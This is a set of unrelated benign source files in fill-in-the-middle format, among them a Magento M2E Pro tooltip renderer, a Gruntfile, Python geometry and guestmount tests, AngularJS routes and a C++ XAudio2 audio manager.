htmlCont.appendChild(new Element('span')).insert(messageHtml);
return container;
},
// ---------------------------------------
getCustomValueTypeNote: function()
{
if (this.specific.data_definition.definition) {
return null;
}
if (this.specific.params.type == 'int') return this.getIntTypeNote(this.specific.params);
if (this.specific.params.type == 'float') return this.getFloatTypeNote(this.specific.params);
if (this.specific.params.type == 'string') return this.getStringTypeNote(this.specific.params);
if (this.specific.params.type == 'date_time') return this.getDatTimeTypeNote(this.specific.params);
return this.getAnyTypeNote(this.specific.params);
},
getIntTypeNote: function(params)
{
var notes = [];
var handler = {
'type': function() {
notes[0] = M2ePro.translator.translate('Type: Numeric.') + ' ';
},
'min_value': function(restriction) {
notes[1] = M2ePro.translator.translate('Min:') + ' ' + restriction + '. ';
},
'max_value': function(restriction) {
notes[2] = M2ePro.translator.translate('Max:') + ' ' + restriction + '. ';
},
'total_digits': function(restriction) {
notes[3] = M2ePro.translator.translate('Total digits (not more):') + ' ' + restriction + '. ';
}
};
for (var paramName in params) {
params.hasOwnProperty(paramName) && handler[paramName] && handler[paramName](params[paramName]);
}
return notes.join('');
},
getFloatTypeNote: function(params)
{
var notes = [];
var handler = {
'type': function() {
notes[0] = M2ePro.translator.translate('Type: Numeric floating point.') + ' ';
},
'min_value': function(restriction) {
notes[1] = M2ePro.translator.translate('Min:') + ' ' + restriction + '. ';
},
'max_value': function(restriction) {
notes[2] = M2ePro.translator.translate('Max:') + ' ' + restriction + '. ';
},
'decimal_places': function(restriction) {
notes[3] = M2ePro.translator.translate('Decimal places (not more):') + ' ' + restriction.value + '. ';
},
'total_digits': function(restriction) {
notes[4] = M2ePro.translator.translate('Total digits (not more):') + ' ' + restriction + '. ';
}
};
for (var paramName in params) {
params.hasOwnProperty(paramName) && handler[paramName] && handler[paramName](params[paramName]);
}
return notes.join('');
},
getStringTypeNote: function(params)
{
var notes = [];
var handler = {
'type': function() {
notes[0] = M2ePro.translator.translate('Type: String.') + ' ';
},
'min_length': function(restriction) {
notes[1] = restriction != 1 ? M2ePro.translator.translate('Min length:') + ' ' + restriction : '';
},
'max_length': function(restriction) {
notes[2] = M2ePro.translator.translate('Max length:') + ' ' + restriction;
},
'pattern': function(restriction) {
if (restriction == '[a-zA-Z][a-zA-Z]|unknown') {
notes[3] = M2ePro.translator.translate('Two uppercase letters or "unknown".');
}
}
};
for (var paramName in params) {
params.hasOwnProperty(paramName) && handler[paramName] && handler[paramName](params[paramName]);
}
return notes.join('');
},
getDatTimeTypeNote: function(params)
{
var notes = [];
var handler = {
'type': function(restriction) {
notes.push(M2ePro.translator.translate('Type: Date time. Format: YYYY-MM-DD hh:mm:ss'));
}
};
for (var paramName in params) {
params.hasOwnProperty(paramName) && handler[paramName] && handler[paramName](params[paramName]);
}
return notes.join('');
},
getAnyTypeNote: function(params)
{
return M2ePro.translator.translate('Can take any value.');
},
// ---------------------------------------
getCustomAttributeTypeNote: function()
{
if (this.specific.values.length <= 0 && this.specific.recommended_values.length <= 0) {
return null;
}
var span = new Element('span');
var title = this.specific.values.length > 0 ? M2ePro.translator.translate('Allowed Values') : M2ePro.translator.translate('Recommended Values');
span.appendChild(new Element('span')).insert('<b>' + title + ': </b>');
var ul = span.appendChild(new Element('ul'));
var noteValues = this.specific.values.length > 0 ? this.specific.values : this.specific.recommended_values;
noteValues.each(function(value) {
ul.appendChild(new Element('li')).insert(value);
});
return span.outerHTML;
},
// ---------------------------------------
getDefinitionNote: function(definitionPart)
{
if (!definitionPart.definition) {
return;
}
var div = new Element('div');
div.appendChild(new Element('div', {style: 'padding: 2px 0; margin-top: 5px;'}))
.insert('<b>' + M2ePro.translator.translate('Definition:') + '</b>');
div.appendChild(new Element('div'))
.insert(definitionPart.definition);
if (definitionPart.tips && definitionPart.tips.match(/[a-z0-9]/i)) {
div.appendChild(new Element('div', {style: 'padding: 2px 0; margin-top: 5px;'}))
.insert('<b>' + M2ePro.translator.translate('Tips:') + '</b>');
div.appendChild(new Element('div'))
.insert(definitionPart.tips);
}
if (definitionPart.example && definitionPart.example.match(/[a-z0-9]/i)) {
div.appendChild(new Element('div', {style: 'padding: 2px 0; margin-top: 5px;'}))
.insert('<b>' + M2ePro.translator.translate('Examples:') + '</b>');
div.appendChild(new Element('div'))
.insert(definitionPart.example);
}
return div.outerHTML;
},
// ---------------------------------------
getSpecificOverriddenNotice: function()
{
if (!this.specificHandler.canSpecificBeOverwrittenByVariationTheme(this.specific)) {
return null;
}
var variationThemesList = this.specificHandler.themeAttributes[this.specific.xml_tag];
var message = '<b>' + M2ePro.translator.translate('Value of this Specific can be automatically overwritten by M2E Pro.') + '</b>';
message += '<br/><br/>' + variationThemesList.join(', ');
return this.constructNotice(message);
},
getSpecificParentageNotice: function()
{
if (this.specific.xml_tag != 'Parentage') {
return null;
}
return this.constructNotice(M2ePro.translator.translate('Amazon Parentage Specific will be overridden notice.'));
},
constructNotice: function(message)
{
var container = new Element('div', {
'style': 'float: right; margin-right: 3px; margin-top: 1px;'
});
container.appendChild(new Element('img', {
'src' : M2ePro.url.get('m2epro_skin_url') + '/images/warning.png',
'class' : 'tool-tip-image'
}));
var htmlCont = container.appendChild(new Element('span', {
'class' : 'tool-tip-message tip-left',
'style' : 'display: none; max-width: 500px; border-color: #ffd967; background-color: #fffbf0;'
}));
htmlCont.appendChild(new Element('img', {
'src' : M2ePro.url.get('m2epro_skin_url') + '/images/i_notice.gif',
'style' : 'margin-top: -21px;'
}));
htmlCont.appendChild(new Element('span')).insert(message);
return container;
},
//########################################
observeToolTips: function(indexedXpath)
{
$$('tr[id="' + indexedXpath + '"] .tool-tip-image').each(function(element) {
element.observe('mouseover', MagentoFieldTipObj.showToolTip);
element.observe('mouseout', MagentoFieldTipObj.onToolTipIconMouseLeave);
});
$$('tr[id="' + indexedXpath + '"] .tool-tip-message').each(function(element) {
element.observe('mouseout', MagentoFieldTipObj.onToolTipMouseLeave);
element.observe('mouseover', MagentoFieldTipObj.onToolTipMouseEnter);
});
},
//########################################
removeAction: function($super, event)
{
// for attributes removing
var myEvent = new CustomEvent('parent-specific-row-is-removed');
$(this.indexedXPath).dispatchEvent(myEvent);
// ---------------------------------------
var deleteResult = $super(event);
this.throwEventsToParents();
return deleteResult;
},
cloneAction: function($super, event)
{
var newIndexedXpath = $super(event);
this.observeToolTips(newIndexedXpath);
var myEvent = new CustomEvent('parent-specific-row-is-cloned', { 'new_indexed_xpath': newIndexedXpath });
$(this.indexedXPath).dispatchEvent(myEvent);
return newIndexedXpath;
},
// ---------------------------------------
getRowContainer: function()
{
if ($(this.indexedXPath)) {
return $(this.indexedXPath);
}
var grid = $$('table[id="'+ this.getParentIndexedXpath() +'_grid"] table.border tbody').first();
return grid.appendChild(new Element('tr', {id: this.indexedXPath}));
}
// ---------------------------------------
});<|fim▁end|> | AmazonTemplateDescriptionCategorySpecificGridRowRenderer = Class.create(AmazonTemplateDescriptionCategorySpecificRenderer, {
// ---------------------------------------
|
<|file_name|>Gruntfile.js<|end_file_name|><|fim▁begin|>module.exports = function ( grunt ) {
grunt.initConfig( {
pkg: grunt.file.readJSON( 'package.json' ),
banner: '/*!\n' +
'* <%= pkg.name %> v<%= pkg.version %> - <%= pkg.description %>\n' +
'* Copyright (c) <%= grunt.template.today(\'yyyy\') %> <%= pkg.author %>. All rights reserved.\n' +
'* Licensed under <%= pkg.license %> License.\n' +
'*/',
connect: {
docs: {
options: {
protocol: 'http',
port: 8080,
hostname: 'localhost',
livereload: true,
base: {
path: 'docs/',
options: {
index: 'index.htm'
}
},
open: 'http://localhost:8080/index.htm'
}
}
},
sass: {
docs: {
options: {
style: 'expanded'
},
files: {
'dist/autoc.css': 'src/sass/autoc.scss',
'docs/css/layout.css': 'sass/layout.scss'
}
}
},
csslint: {
docs: {
options: {
'bulletproof-font-face': false,
'order-alphabetical': false,
'box-model': false,
'vendor-prefix': false,
'known-properties': false
},
src: [
'dist/autoc.css',
'docs/css/layout.css'
]
}
},
cssmin: {
dist: {
files: {
'dist/autoc.min.css': [
'dist/autoc.css'
]
}
},
docs: {
files: {
'docs/css/layout.min.css': [
'node_modules/normalize.css/normalize.css',
'docs/css/layout.css',
'dist/autoc.css'
]
}
}
},
jshint: {
src: {
options: {
jshintrc: '.jshintrc'<|fim▁hole|> },
src: [
'src/**/*.js'
],
filter: 'isFile'
}
},
uglify: {
options: {
banner: '<%= banner %>'
},
docs: {
files: {
'docs/js/autoc.min.js': [
'src/autoc.js'
]
}
},
dist: {
files: {
'dist/autoc.min.js': [
'src/autoc.js'
]
}
}
},
copy: {
docs: {
files: [
{
'docs/js/jquery.js': 'node_modules/jquery/dist/jquery.js'
}
]
},
dist: {
files: [
{
'dist/autoc.js': 'src/autoc.js'
}
]
}
},
pug: {
docs: {
options: {
pretty: true,
data: {
debug: true
}
},
files: {
// create api home page
'docs/index.htm': 'pug/api/index.pug'
}
}
},
watch: {
css: {
files: [
'sass/**/**.scss'
],
tasks: [
'sass',
'csslint',
'cssmin'
]
},
js: {
files: [
'src/**/*.js'
],
tasks: [
'jshint:src',
'uglify',
'copy:docs'
]
},
pug: {
files: [
'pug/**/**.pug'
],
tasks: [
'pug:docs'
]
},
docs: {
files: [
'docs/**/**.html',
'docs/**/**.js',
'docs/**/**.css'
],
options: {
livereload: true
}
}
}
} );
grunt.loadNpmTasks( 'grunt-contrib-connect' );
grunt.loadNpmTasks( 'grunt-contrib-copy' );
grunt.loadNpmTasks( 'grunt-contrib-sass' );
grunt.loadNpmTasks( 'grunt-contrib-csslint' );
grunt.loadNpmTasks( 'grunt-contrib-cssmin' );
grunt.loadNpmTasks( 'grunt-contrib-jshint' );
grunt.loadNpmTasks( 'grunt-contrib-uglify' );
grunt.loadNpmTasks( 'grunt-contrib-pug' );
grunt.loadNpmTasks( 'grunt-contrib-watch' );
grunt.registerTask( 'html', [ 'pug' ] );
grunt.registerTask( 'http', [
'connect:docs',
'watch'
] );
grunt.registerTask( 'hint', [ 'jshint:src' ] );
grunt.registerTask( 'scripts', [
'jshint',
'uglify',
'copy'
] );
grunt.registerTask( 'styles', [
'sass',
'csslint',
'cssmin'
] );
grunt.registerTask( 'default', [
'connect:docs',
'sass',
'csslint',
'cssmin',
'jshint:src',
'uglify',
'copy',
'pug',
'watch'
] );
};<|fim▁end|> | |
<|file_name|>test_110_polygons.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Mathmaker creates automatically maths exercises sheets
# with their answers
# Copyright 2006-2017 Nicolas Hainaux <[email protected]>
# This file is part of Mathmaker.
# Mathmaker is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# any later version.
# Mathmaker is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Mathmaker; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import pytest
from mathmaker.lib.core.root_calculus import Value
from mathmaker.lib.core.base_geometry import Point
from mathmaker.lib.core.geometry import Polygon
@pytest.fixture
def p1():
p1 = Polygon([Point('A', 0.5, 0.5),
Point('B', 3, 1),
Point('C', 3.2, 4),
Point('D', 0.8, 3)
])
p1.side[0].label = Value(4, unit='cm')
p1.side[1].label = Value(3, unit='cm')
p1.side[2].label = Value(2, unit='cm')
p1.side[3].label = Value(6.5, unit='cm')
p1.angle[0].label = Value(64, unit="\\textdegree")
p1.angle[1].label = Value(128, unit="\\textdegree")
p1.angle[2].label = Value(32, unit="\\textdegree")
p1.angle[3].label = Value(256, unit="\\textdegree")
p1.angle[0].mark = 'simple'
p1.angle[1].mark = 'simple'
p1.angle[2].mark = 'simple'
p1.angle[3].mark = 'simple'
return p1
def test_p1_into_euk(p1):
"""Check Polygon's generated euk file."""
assert p1.into_euk() == \
'box -0.1, -0.1, 3.8, 4.6\n\n'\
'A = point(0.5, 0.5)\n'\
'B = point(3, 1)\n'\
'C = point(3.2, 4)\n'\
'D = point(0.8, 3)\n'\
'\n'\
'draw\n'\
' (A.B.C.D)\n'\
' $\\rotatebox{11}{\sffamily 4~cm}$ A 11 - 12.7 deg 4.1\n'\
' $\\rotatebox{86}{\sffamily 3~cm}$ B 86 - 8.9 deg 4.9\n'\
' $\\rotatebox{23}{\sffamily 2~cm}$ C 203 - 12.2 deg 4.2\n'\
' $\\rotatebox{83}{\sffamily 6.5~cm}$ D 263 - 12.9 deg 4.1\n'\
' $\\rotatebox{47.3}{\sffamily 64\\textdegree}$ A 47.3 deg 2.7\n'\
' $\\rotatebox{-41.3}{\sffamily 128\\textdegree}$ B 138.7 deg 2.7\n'\
' $\\rotatebox{54.3}{\sffamily 32\\textdegree}$ C 234.3 deg 2.7\n'\
' $\\rotatebox{322.7}{\sffamily 256\\textdegree}$ D 322.7 deg 2.7\n'\
' "A" A 227.3 deg, font("sffamily")\n'\
' "B" B 318.7 deg, font("sffamily")\n'\
' "C" C 54.3 deg, font("sffamily")\n'\
' "D" D 142.7 deg, font("sffamily")\n'\
'end\n\n'\
'label\n'\
' B, A, D simple\n'\
' C, B, A simple\n'\
' D, C, B simple\n'\
' A, D, C simple\n'\
'end\n'
def test_p1_rename_errors(p1):
"""Check wrong arguments trigger exceptions when renaming."""
with pytest.raises(TypeError):
p1.rename(5678)
with pytest.raises(ValueError):
p1.rename('KJLIZ')
def test_p1_renamed(p1):
"""Check renaming Polygon is OK."""
p1.rename('YOGA')
assert p1.into_euk() == \
'box -0.1, -0.1, 3.8, 4.6\n\n'\
'A = point(0.5, 0.5)\n'\
'G = point(3, 1)\n'\
'O = point(3.2, 4)\n'\
'Y = point(0.8, 3)\n'\
'\n'\
'draw\n'\
' (A.G.O.Y)\n'\
' $\\rotatebox{11}{\sffamily 4~cm}$ A 11 - 12.7 deg 4.1\n'\
' $\\rotatebox{86}{\sffamily 3~cm}$ G 86 - 8.9 deg 4.9\n'\
' $\\rotatebox{23}{\sffamily 2~cm}$ O 203 - 12.2 deg 4.2\n'\
' $\\rotatebox{83}{\sffamily 6.5~cm}$ Y 263 - 12.9 deg 4.1\n'\
' $\\rotatebox{47.3}{\sffamily 64\\textdegree}$ A 47.3 deg 2.7\n'\
' $\\rotatebox{-41.3}{\sffamily 128\\textdegree}$ G 138.7 deg 2.7\n'\
' $\\rotatebox{54.3}{\sffamily 32\\textdegree}$ O 234.3 deg 2.7\n'\
' $\\rotatebox{322.7}{\sffamily 256\\textdegree}$ Y 322.7 deg 2.7\n'\
' "A" A 227.3 deg, font("sffamily")\n'\
' "G" G 318.7 deg, font("sffamily")\n'\
' "O" O 54.3 deg, font("sffamily")\n'\
' "Y" Y 142.7 deg, font("sffamily")\n'\
'end\n\n'\
'label\n'\
' G, A, Y simple\n'\
' O, G, A simple\n'\
' Y, O, G simple\n'\
' A, Y, O simple\n'\<|fim▁hole|><|fim▁end|> | 'end\n' |
<|file_name|>SampleApplication.java<|end_file_name|><|fim▁begin|>package com.gdgand.rxjava.rxjavasample.hotandcold;
import android.app.Application;
import com.gdgand.rxjava.rxjavasample.hotandcold.di.component.ApplicationComponent;
import com.gdgand.rxjava.rxjavasample.hotandcold.di.component.DaggerApplicationComponent;
import com.gdgand.rxjava.rxjavasample.hotandcold.di.module.ApplicationModule;
import com.gdgand.rxjava.rxjavasample.hotandcold.di.module.DataModule;
public class SampleApplication extends Application {
private ApplicationComponent applicationComponent;
@Override
public void onCreate() {
super.onCreate();
applicationComponent = createComponent();
}
private ApplicationComponent createComponent() {
return DaggerApplicationComponent.builder()
.applicationModule(new ApplicationModule(this))
.dataModule(new DataModule())
.build();
}
public ApplicationComponent getApplicationComponent() {
return applicationComponent;
}
<|fim▁hole|><|fim▁end|> | } |
<|file_name|>tables.client.routes.js<|end_file_name|><|fim▁begin|>(function () {
'use strict';
angular
.module('tables')
.config(routeConfig);
routeConfig.$inject = ['$stateProvider'];
function routeConfig($stateProvider) {
$stateProvider
.state('tables', {
abstract: true,
url: '/tables',
template: '<ui-view/>'<|fim▁hole|> })
.state('tables.list', {
url: '',
templateUrl: 'modules/tables/client/views/list-tables.client.view.html',
controller: 'TablesListController',
controllerAs: 'vm',
data: {
pageTitle: 'Tables List'
}
})
.state('tables.create', {
url: '/create',
templateUrl: 'modules/tables/client/views/form-table.client.view.html',
controller: 'TablesController',
controllerAs: 'vm',
resolve: {
tableResolve: newTable
},
data: {
pageTitle : 'Tables Create'
}
})
.state('tables.edit', {
url: '/:tableId/edit',
templateUrl: 'modules/tables/client/views/form-table.client.view.html',
controller: 'TablesController',
controllerAs: 'vm',
resolve: {
tableResolve: getTable
},
data: {
roles: ['*'],
pageTitle: 'Edit Table {{ tableResolve.name }}'
}
})
.state('tables.view', {
url: '/:tableId',
templateUrl: 'modules/tables/client/views/view-table.client.view.html',
controller: 'TablesController',
controllerAs: 'vm',
resolve: {
tableResolve: getTable
},
data:{
pageTitle: 'Table {{ articleResolve.name }}'
}
});
}
getTable.$inject = ['$stateParams', 'TablesService'];
function getTable($stateParams, TablesService) {
return TablesService.get({
tableId: $stateParams.tableId
}).$promise;
}
newTable.$inject = ['TablesService'];
function newTable(TablesService) {
return new TablesService();
}
})();<|fim▁end|> | |
<|file_name|>guestmount.py<|end_file_name|><|fim▁begin|>import logging
import os
from autotest.client.shared import error, utils
from virttest import data_dir, utils_test
<|fim▁hole|> result = utils.run("umount -l %s" % mountpoint, ignore_status=True)
if result.exit_status:
logging.debug("Umount %s failed", mountpoint)
return False
logging.debug("Umount %s successfully", mountpoint)
return True
def run(test, params, env):
"""
Test libguestfs tool guestmount.
"""
vm_name = params.get("main_vm")
vm = env.get_vm(vm_name)
start_vm = "yes" == params.get("start_vm", "no")
if vm.is_alive() and not start_vm:
vm.destroy()
elif vm.is_dead() and start_vm:
vm.start()
# Create a file to vm with guestmount
content = "This is file for guestmount test."
path = params.get("gm_tempfile", "/home/gm_tmp")
mountpoint = os.path.join(data_dir.get_tmp_dir(), "mountpoint")
status_error = "yes" == params.get("status_error", "yes")
readonly = "no" == params.get("gm_readonly", "no")
special_mount = "yes" == params.get("gm_mount", "no")
vt = utils_test.libguestfs.VirtTools(vm, params)
vm_ref = params.get("gm_vm_ref")
is_disk = "yes" == params.get("gm_is_disk", "no")
# Automatically get disk if no disk specified.
if is_disk and vm_ref is None:
vm_ref = utils_test.libguestfs.get_primary_disk(vm)
if special_mount:
# Get root filesystem before test
params['libvirt_domain'] = params.get("main_vm")
params['gf_inspector'] = True
gf = utils_test.libguestfs.GuestfishTools(params)
roots, rootfs = gf.get_root()
gf.close_session()
if roots is False:
raise error.TestError("Can not get root filesystem "
"in guestfish before test")
logging.info("Root filesystem is:%s", rootfs)
params['special_mountpoints'] = [rootfs]
writes, writeo = vt.write_file_with_guestmount(mountpoint, path, content,
vm_ref)
if umount_fs(mountpoint) is False:
logging.error("Umount vm's filesystem failed.")
if status_error:
if writes:
if readonly:
raise error.TestFail("Write file to readonly mounted "
"filesystem successfully.Not expected.")
else:
raise error.TestFail("Write file with guestmount "
"successfully.Not expected.")
else:
if not writes:
raise error.TestFail("Write file to mounted filesystem failed.")<|fim▁end|> |
def umount_fs(mountpoint):
if os.path.ismount(mountpoint): |
<|file_name|>SGD_AudioManager.cpp<|end_file_name|><|fim▁begin|>/***********************************************************************\
| |
| File: SGD_AudioManager.cpp |
| Author: Douglas Monroe |
| Last Modified: 2014-03-10 |
| |
| Purpose: To load and play audio files |
| .wav - sound effect |
| .xwm - music |
| |
| © 2014 Full Sail, Inc. All rights reserved. The terms "Full Sail", |
| "Full Sail University", and the Full Sail University logo are |
| either registered service marks or service marks of Full Sail, Inc. |
| |
| Derived From: "XAudio2 Programming Guide" - MSDN |
| http://msdn.microsoft.com/en-us/library/hh405049%28v=vs.85%29.aspx |
| |
\***********************************************************************/
#include "stdafx.h"
#include "SGD_AudioManager.h"
// Uses assert for debug breaks
#include <cassert>
// Uses OutputDebugString for debug text
#define WIN32_LEAN_AND_MEAN
#include <Windows.h>
#include <cstring>
// Uses std::multimap for storing voices
#include <map>
// Uses DirectInput to solve random memory-leak detection bug?!?
#define DIRECTINPUT_VERSION 0x0800
#include <dinput.h>
#pragma comment(lib, "dinput8.lib")
// Uses XAudio2 for audio
#include <XAudio2.h>
#pragma comment (lib, "dxguid.lib")
// Uses HandleManager for storing data
#include "SGD_HandleManager.h"
namespace SGD
{
namespace SGD_IMPLEMENTATION
{
//*************************************************************//
// AudioInfo
// - stores info for the audio file: name, buffer, reference count
struct AudioInfo
{
wchar_t* wszFilename; // file name
unsigned int unRefCount; // reference count
WAVEFORMATEXTENSIBLE format; // wave format (sample rate, etc)
XAUDIO2_BUFFER buffer; // buffer
XAUDIO2_BUFFER_WMA bufferwma; // additional buffer packets for xwm
float fVolume; // audio volume
};
//*************************************************************//
//*************************************************************//
// VoiceInfo
// - stores info for the source voice instance: audio handle, buffer, state
struct VoiceInfo
{
HAudio audio; // audio handle
IXAudio2SourceVoice* voice; // source voice
bool loop; // should repeat
bool paused; // currently paused
};
//*************************************************************//
//*************************************************************//
// AudioManager
// - concrete class for loading and playing audio files
// - only supports .wav and .xwm files
// - .wav files are categorized as 'Sound Effects'
// - .xwm files are categorized as 'Music'
// - uses IHandleManager to store audio data
class AudioManager : public SGD::AudioManager
{
public:
// SINGLETON
static AudioManager* GetInstance ( void );
static void DeleteInstance ( void );
virtual bool Initialize ( void ) override;
virtual bool Update ( void ) override;
virtual bool Terminate ( void ) override;
//enum class AudioCategory
//{
// Music, // *.xwm files
// SoundEffects, // *.wav files
//};
virtual int GetMasterVolume ( AudioGroup group ) override;
virtual bool SetMasterVolume ( AudioGroup group, int value ) override;
virtual HAudio LoadAudio ( const wchar_t* filename ) override;
virtual HAudio LoadAudio ( const char* filename ) override;
virtual HVoice PlayAudio ( HAudio handle, bool looping ) override;
virtual bool IsAudioPlaying ( HAudio handle ) override;
virtual bool StopAudio ( HAudio handle ) override;
virtual bool UnloadAudio ( HAudio& handle ) override;
virtual bool IsVoiceValid ( HVoice handle ) override;
virtual bool IsVoicePlaying ( HVoice handle ) override;
virtual bool PauseVoice ( HVoice handle, bool pause ) override;
virtual bool StopVoice ( HVoice& handle ) override;
virtual int GetVoiceVolume ( HVoice handle ) override;
virtual bool SetVoiceVolume ( HVoice handle, int value ) override;
virtual int GetAudioVolume ( HAudio handle ) override;
virtual bool SetAudioVolume ( HAudio handle, int value ) override;
private:
// SINGLETON
static AudioManager* s_Instance; // the ONE instance
AudioManager ( void ) = default; // Default constructor
virtual ~AudioManager ( void ) = default; // Destructor
AudioManager ( const AudioManager& ) = delete; // Copy constructor
AudioManager& operator= ( const AudioManager& ) = delete; // Assignment operator
// Wrapper Status
enum EAudioManagerStatus
{
E_UNINITIALIZED,
E_INITIALIZED,
E_DESTROYED
};
EAudioManagerStatus m_eStatus = E_UNINITIALIZED; // wrapper initialization status
IXAudio2* m_pXAudio = nullptr; // XAudio2 api
IXAudio2MasteringVoice* m_pMasterVoice = nullptr; // master voice
IXAudio2SubmixVoice* m_pSfxVoice = nullptr; // sound effects submix voice
IXAudio2SubmixVoice* m_pMusVoice = nullptr; // music submix voice
DWORD m_dwChannelMask = 0; // speaker configuration
UINT32 m_unChannels = 0; // speaker configuration count
typedef std::multimap< HAudio, HVoice > VoiceMap;
VoiceMap m_mVoices; // source voice map
HandleManager< AudioInfo > m_HandleManager; // data storage
HandleManager< VoiceInfo > m_VoiceManager; // voice storage
// AUDIO LOADING HELPER METHODS
static HRESULT FindChunk ( HANDLE hFile, DWORD fourcc, DWORD& dwChunkSize, DWORD& dwChunkDataPosition );
static HRESULT ReadChunkData ( HANDLE hFile, void* buffer, DWORD buffersize, DWORD bufferoffset );
static HRESULT LoadAudio ( const wchar_t* filename, WAVEFORMATEXTENSIBLE& wfx, XAUDIO2_BUFFER& buffer, XAUDIO2_BUFFER_WMA& bufferWMA );
// AUDIO REFERENCE HELPER METHOD
struct SearchInfo
{
const wchar_t* filename; // input
AudioInfo* audio; // output
HAudio handle; // output
};
static bool FindAudioByName( Handle handle, AudioInfo& data, SearchInfo* extra );
};
//*************************************************************//
} // namespace SGD_IMPLEMENTATION
//*****************************************************************//
// Interface singleton accessor
/*static*/ AudioManager* AudioManager::GetInstance( void )
{
// Return the implementation singleton (upcasted to interface)
return (SGD::AudioManager*)SGD_IMPLEMENTATION::AudioManager::GetInstance();
}
// Interface singleton destructor
/*static*/ void AudioManager::DeleteInstance( void )
{
// Deallocate the implementation singleton
return SGD_IMPLEMENTATION::AudioManager::DeleteInstance();
}
//*****************************************************************//
namespace SGD_IMPLEMENTATION
{
//*************************************************************//
// SINGLETON
// Instantiate static pointer to null (no instance yet)
/*static*/ AudioManager* AudioManager::s_Instance = nullptr;
// Singleton accessor
/*static*/ AudioManager* AudioManager::GetInstance( void )
{
// Allocate singleton on first use
if( AudioManager::s_Instance == nullptr )
AudioManager::s_Instance = new AudioManager;
// Return the singleton
return AudioManager::s_Instance;
}
// Singleton destructor
/*static*/ void AudioManager::DeleteInstance( void )
{
// Deallocate singleton
delete AudioManager::s_Instance;
AudioManager::s_Instance = nullptr;
}
//*************************************************************//
//*************************************************************//
// INITIALIZE
bool AudioManager::Initialize( void )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_UNINITIALIZED && "AudioManager::Initialize - wrapper has already been initialized" );
if( m_eStatus != E_UNINITIALIZED )
return false;
HRESULT hResult = S_OK;
// When using a COM object, the thread should be CoInitialized
CoInitializeEx( nullptr, COINIT_MULTITHREADED );
// HACK: Somehow creating DirectInput will allow memory leak detection?!?
IDirectInput8W* pDI_Hack;
DirectInput8Create( (HINSTANCE)GetModuleHandle( nullptr ), DIRECTINPUT_VERSION, IID_IDirectInput8W, (void**)&pDI_Hack, NULL);
pDI_Hack->Release();
// Attempt to create the XAudio2 interface
hResult = XAudio2Create( &m_pXAudio, 0 );
if( FAILED( hResult ) )
{
CoUninitialize();
// MESSAGE
char szBuffer[ 128 ];
_snprintf_s( szBuffer, 128, _TRUNCATE, "!!! AudioManager::Initialize - failed to initialize XAudio2 (0x%X) !!!\n", hResult );
OutputDebugStringA( szBuffer );
return false;
}
// Attempt to create the mastering voice
hResult = m_pXAudio->CreateMasteringVoice( &m_pMasterVoice );
if( FAILED( hResult ) )
{
m_pXAudio->Release();
m_pXAudio = nullptr;
CoUninitialize();
// MESSAGE
char szBuffer[ 128 ];
_snprintf_s( szBuffer, 128, _TRUNCATE, "!!! AudioManager::Initialize - failed to initialize XAudio2 master voice (0x%X) !!!\n", hResult );
OutputDebugStringA( szBuffer );
return false;
}
// Get the speaker configuration
XAUDIO2_DEVICE_DETAILS details;
m_pXAudio->GetDeviceDetails( 0U, &details );
m_dwChannelMask = details.OutputFormat.dwChannelMask;
m_unChannels = details.OutputFormat.Format.nChannels;
// Attempt to create the sfx submix voice
hResult = m_pXAudio->CreateSubmixVoice( &m_pSfxVoice, m_unChannels, 44100, XAUDIO2_VOICE_USEFILTER );
if( FAILED( hResult ) )
{
m_pMasterVoice->DestroyVoice();
m_pMasterVoice = nullptr;
m_pXAudio->Release();
m_pXAudio = nullptr;
CoUninitialize();
// MESSAGE
char szBuffer[ 128 ];
_snprintf_s( szBuffer, 128, _TRUNCATE, "!!! AudioManager::Initialize - failed to initialize XAudio2 sfx submix voice (0x%X) !!!\n", hResult );
OutputDebugStringA( szBuffer );
return false;
}
// Attempt to create the music submix voice
hResult = m_pXAudio->CreateSubmixVoice( &m_pMusVoice, m_unChannels, 44100, XAUDIO2_VOICE_USEFILTER );
if( FAILED( hResult ) )
{
m_pSfxVoice->DestroyVoice();
m_pSfxVoice = nullptr;
m_pMasterVoice->DestroyVoice();
m_pMasterVoice = nullptr;
m_pXAudio->Release();
m_pXAudio = nullptr;
CoUninitialize();
// MESSAGE
char szBuffer[ 128 ];
_snprintf_s( szBuffer, 128, _TRUNCATE, "!!! AudioManager::Initialize - failed to initialize XAudio2 music submix voice (0x%X) !!!\n", hResult );
OutputDebugStringA( szBuffer );
return false;
}
// Success!
m_eStatus = E_INITIALIZED;
return true;
}
//*************************************************************//
//*************************************************************//
// UPDATE
bool AudioManager::Update( void )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::Update - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
// Update the current voices
VoiceMap::iterator iter = m_mVoices.begin();
while( iter != m_mVoices.end() )
{
// Get the voice info from the handle manager
VoiceInfo* info = m_VoiceManager.GetData( iter->second );
assert( info != nullptr && "AudioManager::Update - voice handle has expired" );
if( info == nullptr )
{
iter = m_mVoices.erase( iter );
continue;
}
// Has the voice ended?
XAUDIO2_VOICE_STATE state;
info->voice->GetState( &state );
if( state.BuffersQueued == 0 )
{
// Should it loop?
if( info->loop == true )
{
// Get the data from the Handle Manager
AudioInfo* data = m_HandleManager.GetData( iter->first );
assert( data != nullptr && "AudioManager::Update - voice refers to removed audio" );
if( data == nullptr )
{
// Remove the voice (could recycle it ...)
info->voice->DestroyVoice();
iter = m_mVoices.erase( iter );
continue;
}
// Play wav or wma?
if( data->bufferwma.PacketCount == 0 )
info->voice->SubmitSourceBuffer( &data->buffer );
else
info->voice->SubmitSourceBuffer( &data->buffer, &data->bufferwma );
}
else
{
// Remove the voice (could recycle it ...)
info->voice->DestroyVoice();
iter = m_mVoices.erase( iter );
continue;
}
}
++iter;
}
return true;
}
//*************************************************************//
//*************************************************************//
// TERMINATE
bool AudioManager::Terminate( void )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::Terminate - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
// Release all audio voices
